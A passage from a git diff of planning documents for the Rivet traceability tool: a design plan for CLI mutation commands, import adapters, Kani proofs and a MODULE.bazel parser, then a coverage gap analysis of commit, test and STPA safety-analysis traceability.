the existing mergeable pattern +(`common` + `score`). SCORE-specific ID regex patterns (e.g., `stkh_req__*`) +are expressed as field-level `allowed-values` patterns. + +--- + +### W2 — CLI Mutation Commands + +**Artifacts:** REQ-031, DD-028, FEAT-052..056 +**Effort:** Large (1-2 weeks) +**STPA linkage:** Satisfies SC-1 (validate cross-references), SC-2 (never silently discard) + +Five new CLI subcommands with schema-validated write: + +``` +rivet add --type --title [--status] [--tags] [--field k=v]... +rivet modify <id> [--set-status] [--set-title] [--add-tag] [--remove-tag] [--set-field k=v] +rivet remove <id> [--force] +rivet link <source-id> --type <link-type> --target <target-id> +rivet unlink <source-id> --type <link-type> --target <target-id> +rivet next-id --type <type> | --prefix <prefix> +``` + +**Architecture:** + +New module `rivet-core/src/mutate.rs` containing: + +```rust +pub struct Mutation { + pub kind: MutationKind, + pub target_file: PathBuf, +} + +pub enum MutationKind { + AddArtifact { artifact: Artifact }, + ModifyArtifact { id: ArtifactId, changes: Vec<FieldChange> }, + RemoveArtifact { id: ArtifactId, force: bool }, + AddLink { source: ArtifactId, link: Link }, + RemoveLink { source: ArtifactId, link: Link }, +} + +pub fn validate_mutation(store: &Store, schema: &Schema, mutation: &Mutation) -> Vec<Diagnostic>; +pub fn apply_mutation(mutation: &Mutation) -> Result<(), Error>; +``` + +Pre-validation checks before any file write: +- ID uniqueness (add) or existence (modify/remove/link) +- Type exists in schema +- Required fields present +- Status in allowed values +- Link type valid for source→target type pair +- Cardinality constraints not violated +- No orphaned incoming links (remove, unless --force) + +File write strategy: YAML append for `add`, targeted string replacement for +`modify`/`link`/`unlink`, line deletion for `remove`. Preserves comments and +formatting in existing file content. + +**Testing:** +- Unit tests for `validate_mutation` covering all rejection cases +- Integration tests: add → validate → verify artifact exists +- Integration tests: link → validate → verify link resolved +- Integration tests: remove with incoming links → verify rejection +- proptest: random mutation sequences never produce invalid YAML + +--- + +### W3 — sphinx-needs JSON Import Adapter + +**Artifacts:** REQ-025, DD-020, FEAT-042 +**Effort:** Medium (3-5 days) +**Depends on:** W1 (score schema for type mapping) + +New adapter `rivet-core/src/formats/needs_json.rs`. + +**Architecture:** + +```rust +pub struct NeedsJsonAdapter; + +impl Adapter for NeedsJsonAdapter { + fn import(&self, source: &str, options: &AdapterOptions) -> Result<Vec<Artifact>>; +} + +pub struct NeedsJsonOptions { + pub type_mapping: HashMap<String, String>, // sphinx-needs type → rivet type + pub id_transform: IdTransform, // underscores_to_dashes, etc. + pub field_mapping: HashMap<String, String>, // optional field renaming +} +``` + +needs.json structure (sphinx-needs export): +```json +{ + "current_version": "1.0", + "versions": { + "": { + "needs": { + "stkh_req__automotive_safety": { + "id": "stkh_req__automotive_safety", + "type": "stkh_req", + "title": "Automotive Safety", + "status": "valid", + "links": ["comp_req__safe_compute"], + "links_back": ["feat__safety_monitoring"], + "tags": ["safety"], + ... + } + } + } + } +} +``` + +**Testing:** +- Unit test: parse minimal needs.json with 3-5 needs +- Integration test: import SCORE-style needs.json → validate against score schema +- Round-trip test: import → export as generic YAML → re-import → compare +- Fuzz target: `fuzz_needs_json_import` + +--- + +### W4 — Kani Proof Harnesses + +**Artifacts:** REQ-030, DD-025, FEAT-049 +**Effort:** Medium (3-5 days) +**STPA linkage:** Satisfies SC-14 (proofs verify actual implementation) + +10-15 Kani proof harnesses in `rivet-core/src/proofs/` (or `kani/`): + +| Harness | Target function | Property | +|---------|----------------|----------| +| `proof_parse_artifact_ref` | `parse_artifact_ref()` | No panics for any &str input | +| `proof_schema_merge` | `Schema::merge()` | No panics, all input types preserved | +| `proof_linkgraph_build` | `LinkGraph::build()` | No panics for any valid store+schema | +| `proof_backlink_symmetry` | `LinkGraph::build()` | forward(A→B) implies backward(B←A) | +| `proof_cardinality_check` | `validate()` cardinality | All Cardinality enum arms handled | +| `proof_cycle_detection` | `has_cycles()` | Terminates for graphs up to N nodes | +| `proof_reachable` | `reachable()` | Terminates, result is subset of all nodes | +| `proof_broken_links` | `LinkGraph::build()` | broken set = links with unknown targets | +| `proof_orphan_detection` | `orphans()` | orphans ∩ (has_links ∪ has_backlinks) = ∅ | +| `proof_detect_circular` | `detect_circular_deps()` | DFS terminates for any graph | +| `proof_id_uniqueness` | `Store::insert()` | Duplicate insert returns error | +| `proof_coverage_bounds` | `compute_coverage()` | 0.0 ≤ coverage ≤ 1.0 always | + +**CI integration:** New GitHub Actions job: +```yaml +kani: + runs-on: ubuntu-latest + steps: + - uses: model-checking/kani-github-action@v1 + - run: cargo kani --tests -p rivet-core +``` + +**Testing:** The harnesses ARE the tests. Kani verification replaces +traditional assertions with exhaustive bounded checking. + +--- + +### W5 — Conditional Validation Rules + +**Artifacts:** REQ-023, DD-018, FEAT-040, FEAT-048 +**Effort:** Medium (3-5 days) +**STPA linkage:** Satisfies SC-12 (verify rule consistency before applying) + +**Schema extension:** + +```yaml +# In schema YAML +conditional-rules: + - name: approved-requires-verification-criteria + description: Approved requirements must have verification criteria + when: + field: status + equals: approved + then: + required-fields: [verification-criteria] + severity: error + + - name: asil-requires-mitigation + when: + field: safety + matches: "ASIL_.*" + then: + required-links: [mitigated_by] + severity: error +``` + +**Architecture:** + +New types in `schema.rs`: +```rust +pub struct ConditionalRule { + pub name: String, + pub description: Option<String>, + pub when: Condition, + pub then: Requirement, + pub severity: Severity, +} + +pub enum Condition { + Equals { field: String, value: String }, + Matches { field: String, pattern: String }, + Exists { field: String }, + Not(Box<Condition>), + All(Vec<Condition>), + Any(Vec<Condition>), +} + +pub enum Requirement { + RequiredFields(Vec<String>), + RequiredLinks(Vec<String>), + ForbiddenFields(Vec<String>), + All(Vec<Requirement>), +} +``` + +**Consistency check at schema load time (SC-12):** +```rust +pub fn check_rule_consistency(rules: &[ConditionalRule]) -> Vec<Diagnostic> { + // For each pair of rules that can co-fire on the same artifact: + // Check that their requirements don't contradict + // (e.g., one requires field X, another forbids field X) +} +``` + +**Testing:** +- Unit tests: each Condition variant matches/doesn't match +- Unit tests: each Requirement variant validates/rejects +- Integration test: conditional rule catches missing verification-criteria +- Integration test: contradictory rules detected at schema load time +- proptest: random rule + random artifact → deterministic result +- Kani harness: `proof_condition_eval` — no panics for any field values + +--- + +### W6 — MODULE.bazel rowan Parser + +**Artifacts:** REQ-028, DD-023, FEAT-046 +**Effort:** Medium (3-5 days) +**STPA linkage:** Satisfies SC-13 (reject unrecognized constructs with diagnostics) + +**Architecture:** + +New module `rivet-core/src/formats/starlark.rs` (or separate crate `rivet-starlark`): + +```rust +#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] +#[repr(u16)] +pub enum SyntaxKind { + // Tokens + Whitespace, Comment, Newline, + LParen, RParen, LBracket, RBracket, + Comma, Equals, Colon, Dot, + String, Integer, True, False, None, + Ident, + // Composite nodes + Root, + FunctionCall, // module(), bazel_dep(), git_override() + ArgumentList, + KeywordArgument, // name = "value" + ListExpr, // ["a", "b"] + // Error + Error, +} +``` + +Supported function calls (MODULE.bazel subset): +- `module(name, version, ...)` +- `bazel_dep(name, version, dev_dependency, ...)` +- `git_override(module_name, remote, commit, ...)` +- `archive_override(module_name, urls, strip_prefix, integrity, ...)` +- `local_path_override(module_name, path)` +- `single_version_override(module_name, version, ...)` + +Unsupported constructs emit `SyntaxKind::Error` with diagnostic span: +- `load()` statements +- Variable assignments +- String concatenation +- `if` / `for` expressions +- Function definitions + +**HIR extraction:** + +```rust +pub struct BazelModule { + pub name: String, + pub version: String, + pub deps: Vec<BazelDep>, + pub overrides: Vec<Override>, + pub diagnostics: Vec<Diagnostic>, +} + +pub struct BazelDep { + pub name: String, + pub version: String, + pub dev_dependency: bool, +} + +pub enum Override { + Git { module_name: String, remote: String, commit: String }, + Archive { module_name: String, urls: Vec<String>, integrity: Option<String> }, + LocalPath { module_name: String, path: String }, +} +``` + +**Testing:** +- Unit tests: lex each token type +- Unit tests: parse each function call type +- Unit tests: error recovery on malformed input +- Integration test: parse real MODULE.bazel from eclipse-score/score +- Fuzz target: `fuzz_starlark_parse` +- Kani harness: `proof_starlark_parse` — no panics for any byte input + +--- + +### W7 — Change Impact Analysis (`rivet impact`) + +**Artifacts:** REQ-024, DD-019, FEAT-041 +**Effort:** Medium (3-5 days) + +**Architecture:** + +```rust +// In rivet-core/src/impact.rs +pub struct ImpactAnalysis { + pub changed: Vec<ArtifactId>, // directly changed + pub directly_affected: Vec<ArtifactId>, // depth 1 + pub transitively_affected: Vec<ArtifactId>, // depth 2+ +} + +pub fn compute_impact( + current: &Store, + baseline: &Store, + graph: &LinkGraph, +) -> ImpactAnalysis { + let diff = compute_diff(current, baseline); + let changed_ids: Vec<_> = diff.added.iter() + .chain(diff.modified.iter()) + .chain(diff.removed.iter()) + .collect(); + // Walk link graph from each changed node + // Collect transitively reachable artifacts +} +``` + +Content hashing for baseline comparison: +```rust +pub fn content_hash(artifact: &Artifact) -> u64 { + // Hash title + description + status + fields + links + // Deterministic, ignores formatting +} +``` + +**CLI:** `rivet impact --since <commit|tag> [--format json] [--depth N]` + +**Testing:** +- Unit test: unchanged store → empty impact set +- Unit test: one artifact changed → correct transitive set +- Integration test: modify REQ → verify downstream DD and FEAT in impact set +- proptest: impact set is always a subset of all artifacts + +--- + +### W8 — Test-to-Requirement Source Scanner + +**Artifacts:** REQ-026, DD-021, FEAT-043 +**Effort:** Medium (3-5 days) + +**Architecture:** + +```rust +// In rivet-core/src/test_scanner.rs +pub struct TestMarker { + pub test_name: String, + pub file: PathBuf, + pub line: usize, + pub link_type: String, // "verifies", "partially-verifies" + pub target_id: ArtifactId, +} + +pub fn scan_source_files(paths: &[PathBuf], patterns: &[MarkerPattern]) -> Vec<TestMarker>; + +pub struct MarkerPattern { + pub language: String, // "rust", "python", "generic" + pub regex: Regex, +} +``` + +Default patterns: +- Rust: `// rivet: (verifies|partially-verifies) ([\w-]+)` +- Rust attribute: `#\[rivet::(verifies|partially_verifies)\("([\w-]+)"\)\]` +- Python: `# rivet: (verifies|partially-verifies) ([\w-]+)` +- Python decorator: `@rivet_(verifies|partially_verifies)\("([\w-]+)"\)` + +Ephemeral injection (same pattern as commits.rs): +```rust +pub fn inject_test_nodes(graph: &mut LinkGraph, markers: &[TestMarker]) { + // Add ephemeral test nodes linked to referenced artifacts +} +``` + +**CLI:** `rivet coverage --tests [--scan-paths src/ tests/]` + +**Testing:** +- Unit test: each marker pattern matches expected formats +- Unit test: scan Rust file with `// rivet: verifies REQ-001` +- Integration test: scan → inject → coverage shows test coverage +- Fuzz target: `fuzz_marker_scan` + +--- + +## Cross-Cutting Concerns + +### Documentation updates needed + +Each workstream must update the built-in docs (`rivet docs`): +- W2: New topic `mutation` covering add/modify/remove/link/unlink commands +- W3: Update topic `adapters` with needs-json adapter documentation +- W5: New topic `conditional-rules` with schema syntax and examples +- W6: New topic `build-system-integration` covering MODULE.bazel discovery +- W7: New topic `impact-analysis` covering the impact command +- W8: New topic `test-traceability` covering marker syntax per language + +### CI pipeline additions + +- W4: New `kani` job +- All: Existing test/clippy/fmt jobs cover new code automatically + +### STPA coverage + +New UCAs (UCA-C-10..C-17) and controller constraints (CC-C-10..C-17) cover +the safety-relevant workstreams (W2, W5, W6). Existing STPA analysis covers +W3 (adapter UCAs) and W7/W8 (core engine UCAs). diff --git a/docs/plans/2026-03-16-coverage-gap-analysis.md b/docs/plans/2026-03-16-coverage-gap-analysis.md new file mode 100644 index 0000000..d1a496d --- /dev/null +++ b/docs/plans/2026-03-16-coverage-gap-analysis.md @@ -0,0 +1,444 @@ +# Coverage Gap Analysis: STPA, Commits, and Test Traceability + +**Date:** 2026-03-16 +**Scope:** Rivet v0.2.0 — comprehensive gap analysis across commit traceability, +test coverage, STPA completeness, and lifecycle traceability. + +--- + +## Executive Summary + +| Metric | Current | Target | Gap | +|--------|---------|--------|-----| +| Commit coverage | 11.1% (10/90) | 50%+ | 80 artifacts uncovered | +| Test traceability markers | 0 source markers | 31 REQ markers | No `// rivet: verifies` annotations exist | +| STPA loss scenarios | 19 scenarios | ~27 needed | 8 UCAs lack loss scenarios (UCA-C-10 through UCA-C-17) | +| Lifecycle coverage gaps | 44 artifacts | 0 | Missing downstream links on approved artifacts | +| Validation warnings | 2 | 0 | FEAT-050/051 use `phase-4` (not in allowed values) | +| Schema coverage rules | 100% (all 10 rules) | 100% | Link-level coverage is complete | + +--- + +## Part 1: Commit Coverage Gap + +### Current State + +`rivet commits` reports **11.1% artifact coverage** (10/90 traceable artifacts). + +- **Linked commits:** 1 +- **Orphan commits:** 23 (no artifact trailers) +- **Exempt commits:** 13 +- **Broken refs:** 0 + +### Artifacts Without Commit Coverage (80 total) + +#### Requirements (12 uncovered out of 31) + +| ID | Title | Status | Notes | +|----|-------|--------|-------| +| REQ-020 | Cross-repository artifact linking | draft | Phase 3 — not yet implemented | +| REQ-021 | Distributed baselining | draft | Phase 3 | +| REQ-022 | Single-binary WASM asset embedding | draft | Phase 3 | +| REQ-023 | Conditional validation rules | draft | Phase 3 | +| REQ-024 | Change impact analysis | draft | Phase 3 | +| REQ-025 | sphinx-needs JSON import | draft | Phase 3 | +| REQ-026 | Test-to-requirement traceability extraction | draft | Phase 3 | +| REQ-027 | Build-system-aware cross-repo discovery | draft | Phase 3 | +| REQ-028 | Diagnostic-quality parsing with lossless syntax trees | draft | Phase 3 | +| REQ-029 | Incremental validation via dependency-tracked computation | draft | Phase 3 | +| REQ-030 | Formal correctness guarantees | draft | Phase 3-4 | +| REQ-031 | Schema-validated artifact mutation from CLI | draft | Phase 3 | + +**Analysis:** All 12 uncovered REQs are draft/Phase 3+. The 19 approved REQs +also lack commit coverage because commits predate the trailer system. This is +the biggest gap — retroactively tagging existing commits is not practical. + +#### Design Decisions (15 uncovered out of 28) + +DD-014 through DD-028 — all Phase 3 decisions with no implementing commits yet. + +#### Features (25 uncovered out of 67) + +FEAT-033 through FEAT-057 — all draft/Phase 3 features awaiting implementation. + +#### STPA Artifacts (28 uncovered) + +- H-9, H-10, H-11, H-12 and sub-hazards (8 total) — added in Phase 2.5 +- SC-11 through SC-14 (4 total) — added in Phase 2.5 +- UCA-C-10 through UCA-C-17 (8 total) — added in Phase 2.5 +- CC-C-10 through CC-C-17 (8 total) — added in Phase 2.5 + +### Path from 11.1% to 50%+ + +**Strategy 1: Tag future commits (organic growth)** +- Each Phase 3 implementation commit should reference its REQ/FEAT/DD. +- With 8 parallel workstreams, 5-10 tagged commits per workstream would cover + ~40-80 artifacts, reaching 50%+ within one sprint. + +**Strategy 2: Retroactive coverage for approved artifacts** +- The 19 approved REQs and ~30 approved FEATs implemented in Phase 1-2 have + implementing commits but those commits lack trailers. +- Option A: Create one `chore: retroactive traceability tagging` commit per + artifact batch (e.g., all Phase 1 REQs) with Implements trailers. +- Option B: Add the implementing commit SHAs to the artifact YAML as a + `commits` field — but this is not how `rivet commits` works (it scans git log). +- **Recommended:** Accept that Phase 1-2 commits are organically unlinked. + Focus enforcement on Phase 3+ commits. The `rivet commit-msg-check` hook + (FEAT-029) will prevent future orphans. + +**Strategy 3: Reduce the denominator** +- STPA artifacts (hazards, UCAs, controller-constraints, loss-scenarios) are + safety analysis — they don't have "implementing commits" in the traditional + sense. Consider adding them to `trace-exempt-artifacts` in rivet.yaml. +- If 28 STPA artifacts are exempted, the denominator drops from 90 to 62, + and achieving 50% requires covering ~31 artifacts. + +**Projected coverage with Phase 3 discipline:** +- Phase 3 has ~25 FEATs + ~12 REQs + ~15 DDs to implement = ~52 artifacts. +- If each gets 1+ tagged commit: (10 + 52) / 90 = **68.9%** +- With STPA exemptions: (10 + 52) / 62 = **100%** + +--- + +## Part 2: Test Coverage Gap + +### Current State + +`rivet coverage` reports **100%** on all 10 schema-level coverage rules. +This means every requirement has a feature satisfying it, every hazard has +a constraint, every UCA has a controller constraint, etc. + +However, **zero source-level test traceability markers** exist. A grep for +`rivet: verifies` across rivet-core/src/ and rivet-core/tests/ returned +no results. + +### Test Files and What They Cover + +| Test File | Tests | Effective REQ Coverage | +|-----------|-------|----------------------| +| rivet-core/src/diff.rs | 5 unit tests | REQ-001 (store diffs) | +| rivet-core/src/lifecycle.rs | 4 unit tests | REQ-004 (validation lifecycle) | +| rivet-core/src/document.rs | 8 unit tests | REQ-001, REQ-007 (document system) | +| rivet-core/tests/integration.rs | ~18 integration tests | REQ-001, REQ-003, REQ-004, REQ-007, REQ-010 | +| rivet-core/tests/stpa_roundtrip.rs | ~4 tests | REQ-002 (STPA) | +| rivet-core/tests/proptest_core.rs | 6 proptest properties | REQ-001, REQ-004, REQ-010 | +| rivet-core/tests/oslc_integration.rs | ~2 tests | REQ-006 (OSLC) | +| rivet-core/tests/docs_schema.rs | ~2 tests | REQ-007 (docs) | +| rivet-core/tests/commits_integration.rs | ~4 tests | REQ-017, REQ-018, REQ-019 | +| rivet-core/tests/commits_config.rs | ~3 tests | REQ-017 (config parsing) | +| rivet-core/tests/externals_config.rs | ~3 tests | REQ-020 (cross-repo) | +| rivet-core/tests/mutate_integration.rs | ~8 tests | REQ-031 (mutations) | + +### Requirements With Tests But No Markers + +These requirements have tests that exercise them, but the tests lack +`// rivet: verifies REQ-XXX` annotations: + +- **REQ-001** — Store/model unit tests (diff.rs, document.rs, integration.rs) +- **REQ-002** — STPA roundtrip tests +- **REQ-003** — Integration tests (ASPICE rules) +- **REQ-004** — Link graph tests, proptest, integration +- **REQ-005** — ReqIF integration tests (stub) +- **REQ-007** — Document and CLI integration tests +- **REQ-010** — Schema merge tests, proptest +- **REQ-014** — All TEST-* artifacts verify this +- **REQ-017** — commits_integration.rs, commits_config.rs +- **REQ-018** — commits_integration.rs (commit-msg-check) +- **REQ-019** — commits_integration.rs (orphan detection) +- **REQ-020** — externals_config.rs +- **REQ-031** — mutate_integration.rs + +### Requirements Without Any Tests + +| REQ | Title | Notes | +|-----|-------|-------| +| REQ-006 | OSLC sync | Only stub test, OSLC not implemented | +| REQ-008 | WASM adapters | No WASM runtime tests | +| REQ-009 | Test results as evidence | TEST-010 covers the model, not the release flow | +| REQ-011 | Rust edition 2024 / MSRV | Checked by CI, not unit tested | +| REQ-012 | CI quality gates | Meta-requirement, verified by CI pipeline | +| REQ-013 | Performance benchmarks | Benchmarks exist but not traced | +| REQ-015 | ASPICE 4.0 schemas | Schema tests exist, no marker | +| REQ-016 | Cybersecurity schema | Schema merge tests cover it | +| REQ-021 through REQ-030 | Phase 3 requirements | Not yet implemented | + +### Recommendations + +1. **Add `// rivet: verifies REQ-XXX` markers** to existing test functions. + This requires implementing FEAT-043 (test traceability source scanner) first, + or manually adding markers now in preparation. + +2. **Marker format to adopt** (per FEAT-043 design): + ```rust + // rivet: verifies REQ-001 + #[test] + fn test_store_insert_lookup() { ... } + ``` + +3. **Priority order for adding markers:** + - Phase 1: All integration tests in `tests/integration.rs` (~18 tests) + - Phase 2: Proptest properties in `tests/proptest_core.rs` (6 tests) + - Phase 3: Unit tests in `src/diff.rs`, `src/document.rs`, `src/lifecycle.rs` + - Phase 4: Specialized tests (stpa_roundtrip, commits, externals, mutate) + +4. **Estimated coverage after markers:** 13/31 REQs with direct test markers + (42%). Adding markers to existing tests for REQ-015, REQ-016 would reach + 15/31 (48%). + +--- + +## Part 3: STPA Completeness + +### 3.1 Missing Hazards for Recent Features + +The following features added in Phase 2/2.5 have **no corresponding STPA hazards**: + +#### HTML Export Corruption +The dashboard generates HTML for compliance evidence viewing. If the HTML +export contains corrupted data (XSS in artifact fields rendered as HTML, +broken link graphs, missing artifacts from the export), auditors receive +misleading evidence. + +**Proposed hazard:** +- **H-13: Rivet dashboard renders artifact content as unescaped HTML, enabling + XSS or content injection in compliance evidence** + - Losses: [L-2, L-3] — compliance evidence corruption and data sovereignty + - This is particularly relevant because the dashboard renders artifact + descriptions as HTML and serves as audit evidence (SC-6 applies) + +#### config.js Injection +The dashboard serves a dynamically generated `config.js` that bootstraps +client-side behavior (WebSocket URLs, feature flags). If this is injectable, +an attacker could redirect the dashboard to exfiltrate artifact data. + +**Proposed hazard:** +- **H-14: Rivet dashboard config.js endpoint is injectable, allowing artifact + data exfiltration or UI manipulation** + - Losses: [L-3, L-6] — data sovereignty and audit trail + +#### WASM Runtime Panics +The spar WASM rendering module runs in the dashboard to render AADL diagrams. +If the WASM module panics on malformed AADL input, it could crash the browser +tab or produce an incomplete rendering that masks architecture gaps. + +**Proposed hazard:** +- **H-15: Rivet WASM renderer panics on malformed AADL input, producing + incomplete architecture diagrams** + - Losses: [L-1, L-4] — traceability integrity (missing components in diagram) + and engineering productivity (crashed browser tab) + +### 3.2 System Constraint to Requirement Linkage + +All 14 system constraints are linked to hazards (verified by `rivet coverage`). + +Cross-referencing SCs to REQs: + +| SC | Hazard | Linked to REQ? | Notes | +|----|--------|---------------|-------| +| SC-1 | H-1 | REQ-031 (via links) | Yes | +| SC-2 | H-2 | REQ-031 (via links) | Yes | +| SC-3 | H-3 | No direct REQ link | Should link to REQ-004 | +| SC-4 | H-4 | No direct REQ link | Should link to REQ-005, REQ-006 | +| SC-5 | H-5 | No direct REQ link | Should link to REQ-006 | +| SC-6 | H-6 | No direct REQ link | **Gap** — no REQ for report verification gating | +| SC-7 | H-7 | No direct REQ link | Should link to REQ-017 | +| SC-8 | H-8 | No direct REQ link | Should link to REQ-006 | +| SC-9 | H-4 | No direct REQ link | Should link to REQ-005 | +| SC-10 | H-1, H-3 | No direct REQ link | Should link to REQ-020 | +| SC-11 | H-9 | REQ-029 (via links) | Yes | +| SC-12 | H-10 | REQ-023 (via links) | Yes | +| SC-13 | H-11 | REQ-028 (via links) | Yes | +| SC-14 | H-12 | REQ-030 (via links) | Yes | + +**Gap:** SC-3 through SC-10 have no `satisfies` link from any requirement. +The constraints exist but no requirement explicitly commits to satisfying them. + +### 3.3 UCA to Hazard Linkage + +All 45 UCAs are linked to hazards (100% coverage per `rivet coverage`). No gaps. + +### 3.4 Loss Scenarios for UCA-C-10 through UCA-C-17 + +**Current state:** The loss-scenarios.yaml has 19 scenarios. UCA-C-10 through +UCA-C-17 (the incremental validation and parser UCAs added in Phase 2.5) have +**zero loss scenarios**. This is a significant STPA completeness gap. + +**Missing loss scenarios (8 needed):** + +| UCA | Description | Proposed Loss Scenario | +|-----|-------------|----------------------| +| UCA-C-10 | Salsa doesn't invalidate on file change | LS-C-5: Developer edits YAML, `rivet validate` returns cached PASS from salsa, new validation error is missed. Developer merges broken traceability. | +| UCA-C-11 | Conditional rules not re-evaluated on field change | LS-C-6: Artifact status changes from draft to approved, conditional rule requiring verification-criteria doesn't fire, approved artifact ships without verification evidence. | +| UCA-C-12 | Contradictory conditional rules applied | LS-C-7: Schema update adds rule A requiring field X when status=approved, existing rule B forbids field X when safety=ASIL_B. Engineers cannot make ASIL_B approved artifacts valid, disable validation entirely. | +| UCA-C-13 | Incremental != full validation results | LS-C-8: After a sequence of edits, incremental validation reports PASS. A colleague runs full validation on the same files and gets 3 errors. Trust in the tool collapses, team abandons automated validation. | +| UCA-C-14 | Conditional rules evaluated before schema loads | LS-C-9: Schema file with 5 conditional rules is loaded after validation begins. Only 2 of 5 rules apply. Safety-critical field requirements from the remaining 3 rules are never checked. | +| UCA-C-15 | Parser misses git_override | LS-C-10: MODULE.bazel pins dependency to a specific commit via git_override, but parser extracts registry version. Cross-repo validation runs against wrong commit, reports coverage for artifacts that don't exist in the pinned version. | +| UCA-C-16 | Parser silently skips unsupported Starlark | LS-C-11: MODULE.bazel uses load() to import a macro that declares 5 dependencies. Parser silently skips load(), missing all 5 repos. Cross-repo validation has blind spots for 5 modules. | +| UCA-C-17 | Parser extracts wrong module name | LS-C-12: Parser bug swaps name= and version= keyword values in bazel_dep(). Cross-repo links resolve against "1.2.3" (the version string used as module name), which doesn't exist, but the error message is confusing. | + +### 3.5 HTML Export Controller + +The dashboard (`CTRL-DASH`) is currently modeled as a read-only display +controller. However, the HTML it serves is **de facto compliance evidence** — +auditors view the dashboard to verify traceability coverage. SC-6 states: + +> "Rivet must generate compliance reports only from verified traceability data." + +The dashboard currently has no validation gate — it renders whatever data is +loaded, whether validated or not. This means: + +**Proposed controller extension:** Add control actions to CTRL-DASH: +- **CA-DASH-2:** Render compliance-grade HTML pages (coverage matrix, validation + summary, artifact detail pages used as audit evidence) +- **CA-DASH-3:** Export static HTML snapshots for offline audit review + +**Proposed UCAs for export controller:** +- **UCA-D-3:** Dashboard exports compliance HTML without running validation + first (hazards: H-6, H-3) +- **UCA-D-4:** Dashboard exports HTML containing unescaped artifact content + that renders as executable JavaScript (hazards: L-3, H-7) +- **UCA-D-5:** Dashboard exports HTML snapshot that omits artifacts from + partially-loaded sources (hazards: H-2, H-3) + +--- + +## Part 4: Artifact Inventory for v0.2.0 + +### New STPA Artifacts Needed + +#### Hazards (3 new) + +| ID | Title | Losses | +|----|-------|--------| +| H-13 | Dashboard renders unescaped HTML content in compliance evidence | L-2, L-3 | +| H-14 | Dashboard config.js endpoint is injectable | L-3, L-6 | +| H-15 | WASM renderer panics on malformed input, producing incomplete diagrams | L-1, L-4 | + +#### System Constraints (3 new) + +| ID | Title | Hazards | +|----|-------|---------| +| SC-15 | Dashboard must HTML-escape all artifact content before rendering | H-13 | +| SC-16 | Dashboard must sanitize all dynamically generated JavaScript | H-14 | +| SC-17 | WASM renderers must trap panics and return error SVGs, never crash | H-15 | + +#### UCAs (3 new for dashboard export) + +| ID | Controller | Description | Hazards | +|----|-----------|-------------|---------| +| UCA-D-3 | CTRL-DASH | Dashboard exports compliance HTML without validation gate | H-6, H-3 | +| UCA-D-4 | CTRL-DASH | Dashboard renders unescaped content as executable HTML | H-13 | +| UCA-D-5 | CTRL-DASH | Dashboard exports partial data from incomplete source loading | H-2, H-3 | + +#### Controller Constraints (3 new) + +| ID | Constraint | UCAs | +|----|-----------|------| +| CC-D-3 | Dashboard must gate compliance-grade pages on successful validation | UCA-D-3 | +| CC-D-4 | Dashboard must HTML-escape all artifact-sourced content | UCA-D-4 | +| CC-D-5 | Dashboard must verify all sources loaded before generating export | UCA-D-5 | + +#### Loss Scenarios (8 new for incremental/parser UCAs + 3 for dashboard) + +| ID | Title | UCA | +|----|-------|-----| +| LS-C-5 | Salsa cache returns stale validation pass after file edit | UCA-C-10 | +| LS-C-6 | Conditional rule misses status change to approved | UCA-C-11 | +| LS-C-7 | Contradictory rules make ASIL_B approval impossible | UCA-C-12 | +| LS-C-8 | Incremental/full validation divergence erodes tool trust | UCA-C-13 | +| LS-C-9 | Schema loads after validation, missing conditional rules | UCA-C-14 | +| LS-C-10 | Parser misses git_override, validates wrong commit | UCA-C-15 | +| LS-C-11 | Parser silently skips load(), missing 5 dependencies | UCA-C-16 | +| LS-C-12 | Parser swaps keyword args, resolves wrong module | UCA-C-17 | +| LS-D-1 | Dashboard shows green metrics without validation gate | UCA-D-3 | +| LS-D-2 | XSS in artifact description executes in auditor's browser | UCA-D-4 | +| LS-D-3 | HTML export omits STPA artifacts from unmounted source | UCA-D-5 | + +### Missing Test Traceability Markers + +**Immediate action (no code change needed, just comments):** + +Add `// rivet: verifies REQ-XXX` to these test files: + +| File | Tests | Markers to Add | +|------|-------|---------------| +| rivet-core/tests/integration.rs | 18 tests | REQ-001, REQ-003, REQ-004, REQ-007, REQ-010 | +| rivet-core/tests/proptest_core.rs | 6 tests | REQ-001, REQ-004, REQ-010 | +| rivet-core/tests/stpa_roundtrip.rs | 4 tests | REQ-002, REQ-004 | +| rivet-core/src/diff.rs | 5 tests | REQ-001 | +| rivet-core/src/document.rs | 8 tests | REQ-001, REQ-007 | +| rivet-core/src/lifecycle.rs | 4 tests | REQ-004 | +| rivet-core/tests/commits_integration.rs | 4 tests | REQ-017, REQ-018, REQ-019 | +| rivet-core/tests/commits_config.rs | 3 tests | REQ-017 | +| rivet-core/tests/externals_config.rs | 3 tests | REQ-020 | +| rivet-core/tests/mutate_integration.rs | 8 tests | REQ-031 | + +**Total:** ~63 test functions need markers for ~15 distinct REQs. + +### Lifecycle Coverage Gaps to Close + +44 approved artifacts are missing downstream links (from `rivet validate`): + +**Requirements missing aadl-component allocation (7):** +REQ-012, REQ-013, REQ-014, REQ-015, REQ-016, REQ-017, REQ-018, REQ-019 + +**Features missing design-decision links (5):** +FEAT-001, FEAT-002, FEAT-009, FEAT-010, FEAT-018 + +**Features with no downstream artifacts at all (28):** +All TEST-* and many FEAT-* approved artifacts — these are leaf nodes +(test artifacts and features) that by nature have no further downstream. +Consider adding a lifecycle rule exemption for `feature` artifacts with +tags containing `testing` or `swe-*`. + +### Validation Warnings to Fix + +| Artifact | Issue | Fix | +|----------|-------|-----| +| FEAT-050 | `phase: phase-4` not in allowed values | Add `phase-4` to allowed values in dev.yaml, or change to `future` | +| FEAT-051 | `phase: phase-4` not in allowed values | Same fix | + +--- + +## Priority Action Plan + +### Immediate (this sprint) + +1. Fix FEAT-050/051 phase value warnings +2. Add 8 loss scenarios for UCA-C-10 through UCA-C-17 +3. Add `// rivet: verifies` markers to top 3 test files (~30 tests) +4. Ensure all Phase 3 commits use artifact trailers + +### Short-term (next sprint) + +5. Add H-13/H-14/H-15 hazards and associated SC/UCA/CC/LS artifacts +6. Add SC-3 through SC-10 `satisfies` links from requirements +7. Add remaining test markers (~33 tests) +8. Consider STPA artifact exemption from commit coverage denominator + +### Medium-term (Phase 3) + +9. Implement FEAT-043 (test traceability source scanner) to automate marker extraction +10. Implement FEAT-029 (commit-msg-check) to prevent future orphan commits +11. Add missing DD links for FEAT-001, FEAT-002, FEAT-009, FEAT-010, FEAT-018 +12. Add lifecycle rule exemptions for leaf-node test features + +--- + +## Artifact Count Summary + +| Category | Existing | New Needed | Total After | +|----------|----------|-----------|-------------| +| Losses | 6 | 0 | 6 | +| Hazards | 12 | 3 | 15 | +| Sub-hazards | 10 | 0 | 10 | +| System constraints | 14 | 3 